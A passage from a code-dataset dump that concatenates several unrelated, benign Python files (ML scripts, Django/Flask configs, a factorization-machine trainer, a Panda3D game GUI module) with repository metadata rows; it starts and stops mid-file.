data = np.array(my_list)
data = data[1:,] # remove description
data = data.astype(np.float)
data = normalize(data, axis=0, norm='l2')
#norm age and rating
#data[0:,-2] = data[0:,-2] / data[0:,-2].max()
#data[0:,-1] = data[0:,-1] / data[0:,-1].max()
#data_word_age = data[0:,0:-1]
train_x = data[0:,0:-1]
train_y = np.array(data[0:,-1:]).reshape((data.shape[0], ))
##make ratings binary
train_rating_average = np.average(train_y)
binary_train_y = np.zeros([train_y.shape[0]])
iteration = 0
for i in train_y:
if i > train_rating_average:
binary_train_y[iteration] = 1.0
else:
binary_train_y[iteration] = 0.0
iteration += 1
##
X_train, X_test, y_train, y_test = train_test_split(train_x, binary_train_y, test_size=0.3, random_state=0)
cls = RandomForestClassifier()
cls.fit(X_train,y_train)
p=cls.predict(X_test)
s = cls.score(X_test,y_test)
print(s)
r = p - y_test
r = np.power(r,2)
print("wrong guesses: ",np.sum(r))
### on data not used for createing bag of words
with open('test_top'+d+'.csv', 'r',encoding='utf8') as f:
my_list = []
reader = csv.reader(f)
for row in reader:
my_list.append(row)
data_test = np.array(my_list)
data_test = data_test[1:,] # remove description
data_test = data_test.astype(np.float)
data_test = normalize(data_test, axis=0, norm='l2')
test_x = data_test[0:,0:-1]
test_y = np.array(data_test[0:,-1:]).reshape((data_test.shape[0], ))
##make ratings binary
train_rating_average = np.average(train_y)
binary_test_y = np.zeros([test_y.shape[0]])
iteration = 0
for i in test_y:
if i > train_rating_average:
binary_test_y[iteration] = 1.0
else:
binary_test_y[iteration] = 0.0
iteration += 1
s = cls.score(test_x,binary_test_y)
print("test on data not used for creating bag of words ")
print(s)
| [
"chavdardim90@gmail.com"
] | chavdardim90@gmail.com |
838017f0c58cc85bce1826841deadf7fbdddce44 | 7dd1e2319c9edfb43181b141dbabe9cc5688e6de | /todo_list/project/urls.py | dfef677e5d2ea779dc27e0c20390d3dbd53f07e2 | [] | no_license | hshlepak/todo_list | 29ad840f49ecb6b8133d8b230c35f3702ce95468 | fda91d35f9f09a9ce21f9115bc27127c417f60ac | refs/heads/master | 2022-11-26T06:37:51.377945 | 2018-11-23T12:54:52 | 2018-11-23T12:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from django.conf.urls import url
from django.contrib import admin
from project import views
from .views import TodayTasksView, NextDaysTasksView, ProjectTasksView, ArchiveView, \
AddTaskView, AddProjectView, DeleteTaskView
urlpatterns = [
url(r'^today/$', TodayTasksView.as_view(), name='today-tasks'),
url(r'^next_days/$', NextDaysTasksView.as_view(), name='next-days-tasks'),
url(r'^project_tasks/(?P<project_id>\d+)/$', ProjectTasksView.as_view(), name="project-tasks"),
url(r'^archive/$', ArchiveView, name="archive"),
url(r'^add_task/$', AddTaskView.as_view(), name='add-today-task'),
url(r'^add_project/$', AddProjectView.as_view(), name='add-project'),
url(r'^add_task/(?P<project_id>\d+)/$', AddTaskView.as_view(), name='add-project-task'),
url(r'^edit_task/(?P<slug>[\w-]+)/$', views.edit_task, name='edit-task'),
url(r'^edit_project/(?P<project_id>\d+)$', views.edit_project, name='edit-project'),
url(r'^delete_task/(?P<slug>[\w-]+)/$', DeleteTaskView.as_view(), name="delete-task"),
url(r'^delete_project/(?P<project_id>\d+)/$', views.delete_project, name="delete-project"),
url(r'^finish_task/(?P<slug>[\w-]+)/$', views.finish_task, name='finish-task'),
url(r'^profile/$', views.view_profile, name='profile'),
url(r'^profile/edit/$', views.edit_profile, name='edit-profile'),
url(r'^', TodayTasksView.as_view(), name='today-tasks'),
]
| [
"annashlepak@gmail.com"
] | annashlepak@gmail.com |
308f3a1b9d0fef144aca551c126510b5e4ebbb5c | 9f535db5cee5c861504789375744a02b6d00ff76 | /fm_proxpt.py | fee29e7d651b298e3c834529e8c9c0504aa76dbd | [
"BSD-2-Clause"
] | permissive | alexshtf/proxpt_fm | 96d5fe0c8e0073eaa56cec4b6515a912c96c8089 | 2b7a45d2f5fecdb83b74872c0a6a5b3af5ec5a04 | refs/heads/main | 2023-04-08T02:17:16.879663 | 2021-04-14T17:09:55 | 2021-04-14T17:09:55 | 357,981,107 | 0 | 0 | BSD-2-Clause | 2021-04-14T17:09:56 | 2021-04-14T17:02:53 | null | UTF-8 | Python | false | false | 2,802 | py | from golden_section import min_gss
import math
def neg_entr(z):
if z > 0:
return z * math.log(z)
else:
return 0
def loss_conjugate(z):
return neg_entr(z) + neg_entr(1 - z)
class ProxPtFMTrainer:
def __init__(self, fm, step_size):
# training parameters
self.b0 = fm.bias
self.bs = fm.biases
self.vs = fm.vs
self.step_size = step_size
# temporary state for a single learning step
self.nnz = None # number of nonzeros
self.bias_sum = None # sum of the biases corresponding to the nonzero indicators
self.vs_nz = None # embedding vectors of non-zero indicators, stacked as matrix rows
self.ones_times_vs_nnz = None # the matrix above multiplied by a matrix of ones.
def step(self, w_nz, y_hat):
self.nnz = w_nz.numel()
self.bias_sum = self.bs[w_nz].sum().item()
self.vs_nz = self.vs.weight[w_nz, :]
self.ones_times_vs_nnz = self.vs_nz.sum(dim=0, keepdim=True)
def q_neg(z): # neg. of the maximization objective - since the min_gss code minimizes functions.
return -(self.q_one(y_hat, z) + self.q_two(y_hat, z) - loss_conjugate(z))
opt_interval = min_gss(q_neg, 0, 1)
z_opt = sum(opt_interval) / 2
self.update_biases(w_nz, y_hat, z_opt)
self.update_vectors(w_nz, y_hat, z_opt)
def q_one(self, yhat, z):
return -0.5 * self.step_size * (1 + self.nnz) * (z ** 2) \
- yhat * (self.bias_sum + self.b0.item()) * z
def update_biases(self, w_nz, y_hat, z):
self.bs[w_nz] = self.bs[w_nz] + self.step_size * z * y_hat
self.b0.add_(self.step_size * z * y_hat)
def q_two(self, y_hat, z):
if z == 0:
return 0
# solve the linear system - find the optimal vectors
vs_opt = self.solve_s_inv_system(y_hat, z)
# compute q_2
pairwise = (vs_opt.sum(dim=0).square().sum() - vs_opt.square().sum()) / 2 # the pow-of-sum - sum-of-pow trick
diff_squared = (vs_opt - self.vs_nz).square().sum()
return (-z * y_hat * pairwise + diff_squared / (2 * self.step_size)).item()
def update_vectors(self, w_nz, yhat, z):
# if z = 0 --> we don't need to update the vectors.
if z == 0:
return
# update the vectors with the optimal ones
self.vs.weight[w_nz, :].sub_(self.vectors_update_dir(yhat, z))
def solve_s_inv_system(self, y_hat, z):
return self.vs_nz - self.vectors_update_dir(y_hat, z)
def vectors_update_dir(self, y_hat, z):
beta = self.step_size * y_hat * z
alpha = beta / (1 + beta)
return alpha * (self.vs_nz - self.ones_times_vs_nnz / (1 + beta * (1 - self.nnz)))
| [
"alex.shtoff@oath.com"
] | alex.shtoff@oath.com |
0775eeff28da04ac44eb9954ffe2d0417754463f | 3ab37c984a7a5bd1f190a7ba02c9f15840b9fa70 | /Test.py | 24716720705990e460c478fd16ae6479bc55a3c7 | [
"MIT"
] | permissive | junzhezhang/CommonModules | 1d4f6fea2e5ecf077ca28a909cedb7e740e6151d | 2411d47f8782539606187e2b30bc710021abceb0 | refs/heads/master | 2021-07-14T06:28:30.490683 | 2021-06-21T17:25:14 | 2021-06-21T17:25:14 | 172,190,655 | 0 | 0 | MIT | 2019-02-23T08:29:55 | 2019-02-23T08:29:55 | null | UTF-8 | Python | false | false | 637 | py | # -*- coding:utf-8 -*-
__author__ = "Wang Hewen"
import numpy as np
import CommonModules.DataStructureOperations
import CommonModules.IO
from CommonModules.Utilities import TimeElapsed
CM = CommonModules
logger = CM.Log.Initialize("test.log", WriteToStream = True)
def main():
logger.info("test info")
print(TimeElapsed())
test_array = np.array([[4,5,6]])
#test_array = np.array([])
print(CM.DataStructureOperations.CombineMatricesRowWise(test_array, np.array([[1,2,3]])))
#CM.IO.ExportNpArray("./test.txt", test_array)
print(TimeElapsed(LastTime = True))
return
if __name__ == "__main__":
main() | [
"wanghewen2@sina.com"
] | wanghewen2@sina.com |
b05980f3a55a6c7e642fdbcd2b31df57f6981ec7 | f098f26f882d30ec547e61c9c27c645c29f065e6 | /UserDev/RecoTool/ShowerReco3D/scripts/run_ShowerQuality_multishowers.py | c680a92bef72d2381aebd2f391fd44632a25dab7 | [] | no_license | wddgit/larlite | 59cfaa990c9df23c5645337c171933825339adfb | 8d159ff4259d88e66f769a2ad6df73eee994f306 | refs/heads/trunk | 2021-01-18T08:37:09.297897 | 2016-01-19T21:01:45 | 2016-01-19T21:01:45 | 42,332,618 | 0 | 0 | null | 2015-09-11T21:16:31 | 2015-09-11T21:16:30 | null | UTF-8 | Python | false | false | 1,043 | py | import sys
if len(sys.argv) < 2:
msg = '\n'
msg += "Usage 1: %s $INPUT_ROOT_FILE\n" % sys.argv[0]
msg += '\n'
sys.stderr.write(msg)
sys.exit(1)
from ROOT import larlite as fmwk
# Create ana_processor instance
my_proc = fmwk.ana_processor()
# Set input root files
for x in xrange(len(sys.argv)):
if x < 1:
continue
my_proc.add_input_file(sys.argv[x])
# Specify IO mode
my_proc.set_io_mode(fmwk.storage_manager.kREAD)
# Specify analysis output root file name
my_proc.set_ana_output_file("ShowerQuality_multishowers_ana_out.root");
# Specify data output root file name
my_proc.set_output_file('')
# Create analysis unit
sq_module = fmwk.ShowerQuality_multishowers()
#sq_module.setMCShowerQuality(True)
sq_module.SetShowerProducer("showerrecofuzzy")
#sq_module.SetShowerProducer("showermergeall")
sq_module.SetMaxEnergyCut(99999999.)
sq_module.SetMinEnergyCut(0.)
my_proc.add_process(sq_module)
print
print "Finished configuring ana_processor. Start event loop!"
print
my_proc.run()
sys.exit(0)
| [
"kaleko@nevis.columbia.edu"
] | kaleko@nevis.columbia.edu |
68602507ab106d19d4187d72e082b6ea487a2582 | ac6796175dcab9f1005eb5bf4147ee8291615ca4 | /command_tools.py | cbf3a0925806556c18b0f71474b287466f0bbb0f | [] | no_license | yhliao/util | 1c57c5e8cdadc9922a22992fcd517941fd27326d | ee3aeed328406bf920466b956931b11c61e176cc | refs/heads/master | 2022-12-07T05:42:46.282952 | 2020-08-26T23:21:54 | 2020-08-26T23:21:54 | 290,913,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,563 | py | from datetime import datetime
import os, time
import numpy as np
def log_and_run(runfunc,path,logfile):
if not logfile is None:
startt = datetime.now()
logfile.write("{0}: Job started for {1}\n"
.format(startt,path))
logfile.flush()
code = runfunc(path)
if not logfile is None:
now = datetime.now()
logfile.write("{0}: Job finished for {1}; exit status: {2}; time elapsed: {3}\n"
.format(now,path,code,now-startt))
logfile.flush()
def merge_list(filename_dict,keys):
filename_list = []
if keys is None:
for value in filename_dict.values():
filename_list += value
else:
for key in keys:
filename_list += filename_dict[key]
return filename_list
def commandrun(filename_dict,runfunc,logfile=None,keys=None):
filename_list = merge_list(filename_dict,keys)
for n, filename in enumerate(filename_list):
print ("({0})".format(n),filename)
command = input (">>> ")
if command in ["a","all"]:
for path in filename_list:
log_and_run(runfunc,path,logfile)
elif command=="" and len(filename_list)==1:
path = filename_list[0]
print ("Process the only file by default..")
log_and_run(runfunc,path,logfile)
else:
tokens = command.split('/')
index_str = [str(n) for n in range(len(filename_list))]
for token in tokens:
if token in index_str:
path = filename_list[int(token)]
log_and_run(runfunc,path,logfile)
def sort_mtime(inputlist):
ctimelist = []
mtimelist = []
for filepath in inputlist:
mtime = os.path.getmtime(filepath)
mtimelist.append(mtime)
ctimelist.append(time.ctime(mtime))
sorted_idx = np.argsort(ctimelist)
sorted_inputlist = [inputlist[i] for i in sorted_idx]
sorted_ctimelist = [ctimelist[i] for i in sorted_idx]
return sorted_inputlist, sorted_ctimelist
def command_listrun(filename_list, runfunc, descriptions=None ):
if descriptions is None:
descriptions = [""] * len(filename_list)
pad = max([len(path) for path in filename_list])
for n, (filepath, des) in enumerate(zip(filename_list,descriptions)):
print (n,':', filepath.ljust(pad), des)
command = input (">>> ")
tokens = command.split('/')
runpathlist = []
index_str = [str(n) for n in range(len(filename_list))]
for token in tokens:
if token in index_str:
runpathlist.append( filename_list[int(token)] )
if len(runpathlist) > 0:
runfunc (runpathlist)
| [
"yh_liao@berkeley.edu"
] | yh_liao@berkeley.edu |
cce0e27a550cf80d9004ca72625c9432b0d00e2c | a60fe6c89db97c07d0793be00552511750bf883b | /simulation/tcga/outcome_simulator.py | 1887841769ff5b8247572829e5ca0dc8d828a2e3 | [] | no_license | loucerac/GIN | 3f31c42f49b10b5fe10d4054b02384c937425ac8 | 0d2875bdfaa49dff37c0cfe6f930b8222def111d | refs/heads/main | 2023-06-14T18:41:25.587396 | 2021-07-09T14:31:46 | 2021-07-09T14:31:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,427 | py | from typing import Union
import numpy as np
from experiments.utils import sample_uniform_weights
from simulation.outcome_generators import OutcomeGenerator, generate_outcome_tcga
class TCGASimulator(OutcomeGenerator):
def __init__(
self,
id_to_graph_dict: dict,
noise_mean: float = 0.0,
noise_std: float = 1.0,
dim_covariates: int = 25,
):
super().__init__(
id_to_graph_dict=id_to_graph_dict,
noise_mean=noise_mean,
noise_std=noise_std,
)
self.covariates_weights = sample_uniform_weights(
num_weights=3, dim_covariates=dim_covariates
)
def set_id_to_graph_dict(self, id_to_graph_dict: dict) -> None:
self.id_to_graph_dict = id_to_graph_dict
def generate_outcomes_for_units(
self, pca_features: list, unit_features: list, treatment_ids: list
) -> np.ndarray:
return self.__generate_outcomes(
pca_features=pca_features,
unit_features=unit_features,
treatment_ids=treatment_ids,
)
def generate_outcomes_for_unit(
self, pca_features, unit_features, treatment_ids
) -> np.ndarray:
pca_features = np.repeat(
np.expand_dims(pca_features, axis=0), len(treatment_ids), axis=0
)
unit_features = np.repeat(
np.expand_dims(unit_features, axis=0), len(treatment_ids), axis=0
)
return self.__generate_outcomes(
pca_features=pca_features,
unit_features=unit_features,
treatment_ids=treatment_ids,
)
def __generate_outcomes(
self,
pca_features: Union[list, np.ndarray],
unit_features: Union[list, np.ndarray],
treatment_ids: list,
) -> np.ndarray:
outcomes = []
for pca_features, unit_features, treatment_id in zip(
pca_features, unit_features, treatment_ids
):
prop = self.id_to_graph_dict[treatment_id]["prop"]
outcome = (
generate_outcome_tcga(
unit_features=unit_features,
pca_features=pca_features,
prop=prop,
random_weights=self.covariates_weights,
)
+ self._sample_noise()
)
outcomes.append(outcome)
return np.array(outcomes).squeeze()
| [
"jean.kaddour.20@ucl.ac.uk"
] | jean.kaddour.20@ucl.ac.uk |
b613c5d06b07f98bd6b9ce329835ac582b56b3dc | 4be63cdef3ae05a18e56c46e95fa1aa6bfcbb790 | /PycharmProjects/test_pro/config/__init__.py | 06f7a6a83153cacc242c2dcebe137978fc33e95c | [] | no_license | xuxu001/music | cc683450edad7b4583349854092d10a9c83b93ba | 40c53bd06208e10f02edeab78061f145397e2f8d | refs/heads/master | 2020-07-05T16:19:59.019175 | 2019-08-16T09:17:25 | 2019-08-16T09:17:25 | 202,697,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | #coding:utf-8
#__author__ =='xuxu'
import unit
import requests
from config.config import header, host, logger | [
"j18682948872@163.com"
] | j18682948872@163.com |
f05723369f6be025db307e9fe322e8f5ebd7775d | 10f51b68e0f98a761e68e4f3a72ca5f9723cc937 | /mysite/zad/urls.py | bd261eaa46949ff5dc6d2911422ed41ae52a48a3 | [] | no_license | CARLOS-AND-RABAB/zad | df88a06333f37b5fda86d2acf4bac30bc3b102f0 | 4e467231a42c70b7c778874eec5a3cb5c8bf493d | refs/heads/main | 2023-03-22T18:42:02.022050 | 2021-03-18T14:46:27 | 2021-03-18T14:46:27 | 345,817,968 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from django.urls import path
from . import views
from . import models
from django.conf.urls import url, include
from rest_framework import routers
app_name = 'zad'
urlpatterns = [
path('', views.home, name='home'),
path('AD_details/<int:pk>/', views.AD_details, name='AD_details'),
path('set_language/', views.set_language, name='set_language'),
path('Add_new_AD/', views.Add_new_AD, name='Add_new_AD'),
path('MyAd/', views.MyAd, name='MyAd'),
path('like_Ad/<int:pk>/',views.like_Ad,name='like_Ad'),
path('ContactUs/', views.ContactUs, name='ContactUs'),
]
| [
"rababkhalifamohammed@gmail.com"
] | rababkhalifamohammed@gmail.com |
588fd89ceb2c26f8185620167f76a654f48d4862 | 54bd004dd18f23b46fd75288823977a93d6c7c9d | /Python_basics/English_poet.py | 25376846330552643db0128f53300bf3acfbf400 | [] | no_license | Gagangithub1988/Python | 13f914a200f6f4750c1b7da1467ca7e3f48814d0 | 8c9ba1902ac45841fd3145d49b08547420f15f2d | refs/heads/master | 2022-11-03T22:12:51.799829 | 2020-06-20T06:46:45 | 2020-06-20T06:46:45 | 273,642,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | print('Twinkle, twinkle, little star,\n\tHow I wonder what you are! \n\t\tUp above the world so high, \n\t\tLike a diamond in the sky. \nTwinkle, twinkle, little star, \n\tHow I wonder what you are') | [
"noreply@github.com"
] | Gagangithub1988.noreply@github.com |
9606307b2b8bd4d785fa242550533de26b9bf7f8 | b57bce6b9668ebad5c26452469ad5faf79fee5bf | /tasashop/migrations/0009_entries.py | 1d002a3e23b81bbc7a6ec9a6a704b05a1d201a4f | [] | no_license | DelaCernaJal/TasaShop | c86e95674a0d7727894b4f501a6166b7b06060fb | 2dc077ab2650659a979dc3e415cc8f0bd288442f | refs/heads/main | 2023-06-12T21:24:01.177354 | 2021-06-28T04:01:38 | 2021-06-28T04:01:38 | 377,349,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Generated by Django 3.1.6 on 2021-06-23 10:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tasashop', '0008_auto_20210623_0440'),
]
operations = [
migrations.CreateModel(
name='Entries',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('artPrice', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('artName', models.ImageField(upload_to='')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='tasashop.customer')),
],
),
]
| [
"sharalyn.delacerna@gsfe.tupcavite.edu.ph"
] | sharalyn.delacerna@gsfe.tupcavite.edu.ph |
eeeb70c6908061359f8e8e66ec68d3f700d4b6b4 | 60d5a52944420c148baa3652fa921fda915e82a8 | /app.py | a28a782c944373aa83d3b95440fc2c8af7642753 | [] | no_license | morenoalex87/alm2301-final | 7da62f026935e08f4c0c7fce85262aa7a1c17f1b | 90c073b4fa1e97afbbf5c86bce4cdf32b3b6428f | refs/heads/master | 2022-06-30T16:51:39.517895 | 2020-05-15T19:12:57 | 2020-05-15T19:12:57 | 264,263,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 21 14:57:17 2020
@author: etill
"""
#import statements
from flask import Flask, render_template
#Flask app variable
app = Flask(__name__)
#static route
@app.route("/")
def hello():
return render_template("index.html")
@app.route("/classes")
def classes():
return render_template("classes.html")
@app.route("/clubs")
def clubs():
return render_template("clubs.html")
#start the server
if __name__ == "__main__":
app.run() | [
"m.alex028@yahoo.com"
] | m.alex028@yahoo.com |
a8777de0fff2f753f2a10440eda5dc07631663cd | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/dataflow/stream/handlers/dataflow_yaml_execute_log.py | ec10a68c37c3a15e1547efc90d0f256f3089bb28 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 1,629 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from dataflow.stream.models import DataFlowYamlExecuteLog
def get(task_id):
return DataFlowYamlExecuteLog.objects.get(id=task_id)
def create(**kwargs):
return DataFlowYamlExecuteLog.objects.create(**kwargs)
| [
"terrencehan@tencent.com"
] | terrencehan@tencent.com |
695ede74ca316de3c91389ae6171cbaad557c2b8 | e1f0a05bb3b43d9234c6e4f1e9de52d6f1510699 | /Packages/anw/gui/system.py | 0ee3ee3f2dbc883841880b082ced07afd3c01367 | [] | no_license | colshag/play-cosmica | 5c9454e318045b292f539e7c4aae76782f403396 | 64af9b5c4e6c255fe43894cb3490428417043927 | refs/heads/master | 2020-04-25T12:54:15.641821 | 2019-04-08T01:47:17 | 2019-04-08T01:47:17 | 172,792,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,923 | py | # ---------------------------------------------------------------------------
# Cosmica - All rights reserved by NeuroJump Trademark 2018
# system.py
# Written by Chris Lewis
# ---------------------------------------------------------------------------
# The system represents one System object in map mode
# ---------------------------------------------------------------------------
from panda3d.core import Vec3
import direct.directbase.DirectStart
from anw.gui import textonscreen, rootsim
from anw.func import globals, funcs
class System(rootsim.RootSim):
"""A System Gui for interacting with player Solar Systems in map mode"""
def __init__(self, path, mode, systemDict):
self.systemDict = systemDict
self.id = systemDict['id']
self.empireID = systemDict['myEmpireID']
self.color1 = globals.empires[int(self.empireID)]['color1']
self.color2 = globals.empires[int(self.empireID)]['color2']
rootsim.RootSim.__init__(self, path, 'planet%s' % self.empireID,
'planet_sphere', 0)
self.resourceSize = 0.25
self.mode = mode
self.game = mode.game
self.simCity = None
self.textName = None
self.textCityNum = None
self.textAL = None
self.textEC = None
self.textIA = None
self.simAL = None
self.simEC = None
self.simIA = None
self.simRS = None
self.simJS = None
self.simMF = None
self.simFA = None
self.simMA = None
self.simSY = None
self.simMI = None
self.simWG = None
self.simAF = None
self.simCM = None
self.simSS = None
self.simSC = None
self.simDC = None
self.simRC = None
self.scale = .5 + .5*(self.systemDict['cities']/40.0)
self.x = systemDict['x']
self.z = systemDict['y']
self.y = 20
self.createMySim()
self.armadaPos = {}
self.armyPos = {}
self.warpedArmadaPos = {}
self.warpedArmyPos = {}
self.setPositions()
def setPositions(self):
self.armadaPos = {}
self.armyPos = {}
self.warpedArmadaPos = {}
self.warpedArmyPos = {}
self.setMyPositions()
self.setWarpedPositions()
def setMyPositions(self):
"""Setup Positions as a list of empireIDs"""
count = 0
if self.id in self.game.myArmadas.keys():
self.armadaPos[self.game.myEmpireID] = count
count += 1
if self.id in self.game.myArmies.keys():
self.armyPos[self.game.myEmpireID] = count
count += 1
if self.id in self.game.otherArmadas.keys():
for empireID in self.game.otherArmadas[self.id]:
self.armadaPos[empireID] = count
count += 1
if self.id in self.game.otherArmies.keys():
for empireID in self.game.otherArmies[self.id]:
self.armyPos[empireID] = count
count += 1
def setWarpedPositions(self):
"""Setup Positions as a list of empireIDs"""
count = 0
if self.id in self.game.warpedArmadas.keys():
self.warpedArmadaPos[self.game.myEmpireID] = count
count += 1
if self.id in self.game.warpedArmies.keys():
self.warpedArmyPos[self.game.myEmpireID] = count
def getMyArmadaPosition(self, empireID):
"""Return the x,z positions System wants to place Armada"""
self.setMyPositions()
x = self.x+1.15 + self.armadaPos[empireID]*0.35
z = self.z+0.75
return (x,z)
def getMyWarpedArmadaPosition(self, empireID):
"""Return the x,z positions System wants to place Warped Armada"""
self.setWarpedPositions()
x = self.x+1.3 + self.warpedArmadaPos[empireID]*0.35
z = self.z-0.25
return (x,z)
def getMyArmyPosition(self, empireID):
"""Return the x,z positions System wants to place Army"""
self.setMyPositions()
x = self.x+1.15 + self.armyPos[empireID]*0.35
z = self.z+0.75
return (x,z)
def getMyWarpedArmyPosition(self, empireID):
"""Return the x,z positions System wants to place Warped Army"""
self.setWarpedPositions()
x = self.x+1.3 + self.warpedArmyPos[empireID]*0.35
z = self.z-0.25
return (x,z)
def setColor(self):
"""Set the color of the sim"""
pass
def setGlow(self):
"""Does the object glow"""
pass
def createMySim(self):
"""Create The Sim"""
self.registerMySim()
self.loadMyTexture()
self.setGlow()
self.setColor()
self.setPos()
self.writeName()
self.writeCityNum()
self.createExtras()
self.rotateSim()
def createExtras(self):
"""Display Extra System Information if applicable"""
if self.empireID == self.mode.game.myEmpireID:
self.writeResources()
self.writeProdResources()
self.createIndustrySims()
self.writeCitiesUsed()
def writeCitiesUsed(self):
"""Write the cities used to cities available"""
text = '%s/%s' % (self.systemDict['citiesUsed'],self.systemDict['cities'])
self.textCityNum.myText.setText(text)
def destroy(self):
"""Remove the beaker from game"""
self.removeMyWidgets()
self.sim.removeNode()
self.clearText(self.textName)
self.clearText(self.textCityNum)
self.clearText(self.textAL)
self.clearText(self.textEC)
self.clearText(self.textIA)
def writeName(self):
"""Write the system name"""
text = funcs.getSystemName(self.systemDict)
self.clearText(self.textName)
self.textName = textonscreen.TextOnScreen(self.path, text, 0.25, font=1)
self.textName.writeTextToScreen(self.x-0.9, self.y, self.z+1, wordwrap=14)
self.textName.setColor(globals.colors[self.color1])
def writeCityNum(self):
"""Write City Number"""
text = '%s' % self.systemDict['cities']
self.createSimCity(globals.colors[self.color1])
self.textCityNum = textonscreen.TextOnScreen(self.path, text, 0.20, font=1)
self.textCityNum.writeTextToScreen(self.x-1.5, self.y-0.1, self.z+0.86, wordwrap=10)
self.textCityNum.setColor(globals.colors[self.color1])
def writeResources(self):
"""Display any available resources"""
self.resourceCount = 0
for resource in ['AL','EC','IA']:
value = self.systemDict[resource]
if value > 0:
myMethod = getattr(self, 'write%s' % resource)
myMethod(self.x, self.y+0.05, self.z-1.3-(0.3*self.resourceCount), value)
self.resourceCount += 1
def writeProdResources(self):
"""Display if Resources Currently being Produced"""
self.resourceCount = 0
for resource in ['AL','EC','IA']:
value = self.systemDict['prod%s' % resource]
if value > 0:
myMethod = getattr(self, 'createSim%s' % resource)
myMethod(self.x-0.25, self.y+0.05, self.z-1.25-(0.3*self.resourceCount))
self.resourceCount += 1
def createSimAL(self, x, y, z):
"""Create the AL Sim"""
self.simAL = loader.loadModelCopy('%s/plane' % self.path)
self.simAL.setScale(0.2)
self.simAL.reparentTo(render)
self.simAL.setTransparency(1)
tex = loader.loadTexture('%s/resource.png' % self.path)
self.simAL.setTexture(tex, 0)
self.simAL.setPos(x, y, z)
self.simAL.setColor(globals.colors['guiblue2'])
self.myWidgets.append(self.simAL)
def createSimEC(self, x, y, z):
"""Create the EC Sim"""
self.simEC = loader.loadModelCopy('%s/plane' % self.path)
self.simEC.setScale(0.2)
self.simEC.reparentTo(render)
self.simEC.setTransparency(1)
tex = loader.loadTexture('%s/resource.png' % self.path)
self.simEC.setTexture(tex, 0)
self.simEC.setPos(x, y, z)
self.simEC.setColor(globals.colors['guiyellow'])
self.myWidgets.append(self.simEC)
def createSimIA(self, x, y, z):
"""Create the IA Sim"""
self.simIA = loader.loadModelCopy('%s/plane' % self.path)
self.simIA.setScale(0.2)
self.simIA.reparentTo(render)
self.simIA.setTransparency(1)
tex = loader.loadTexture('%s/resource.png' % self.path)
self.simIA.setTexture(tex, 0)
self.simIA.setPos(x, y, z)
self.simIA.setColor(globals.colors['guired'])
self.myWidgets.append(self.simIA)
def createSimCity(self, color):
"""Create the City Sim"""
self.simCity = loader.loadModelCopy('%s/plane' % self.path)
self.simCity.setScale(0.4)
self.simCity.reparentTo(render)
self.simCity.setTransparency(1)
tex = loader.loadTexture('%s/empire%s.png' % (self.path, self.empireID))
self.simCity.setTexture(tex, 0)
self.simCity.setPos(self.x-1.25, self.y+0.05, self.z+1.28)
self.simCity.setColor(color)
self.myWidgets.append(self.simCity)
def clearIndustrySims(self):
"""Remove all Industry Indicator Sims"""
for id in funcs.sortStringList(self.mode.game.industrydata.keys()):
industryData = self.mode.game.industrydata[id]
code = self.mode.game.industrydata[id].abr[1:]
myAttr = getattr(self, 'sim%s' % code)
if myAttr != None:
myAttr.removeNode()
def createIndustrySims(self):
"""Create all Industry Indicator Sims"""
count = 0
count2 = 0
hasSY = 0
for id in funcs.sortStringList(self.mode.game.industrydata.keys()):
industryData = self.mode.game.industrydata[id]
oldNum = self.systemDict['myOldIndustry'][id]
newNum = self.systemDict['myIndustry'][id]
if oldNum > 0 or newNum > 0:
code = self.mode.game.industrydata[id].abr[1:]
color = funcs.getFutureColor(newNum, oldNum)
if code == 'SY':
hasSY = 1
if code not in ['AF', 'CM', 'SS', 'SC', 'DC', 'RC']:
myMethod = getattr(self, 'createSim%s' % code)
myMethod(color, count)
count += 1
else:
myMethod = getattr(self, 'createSim%s' % code)
myMethod(color, count2)
count2 += 1
if hasSY == 0 and self.systemDict['availSYC'] > 0:
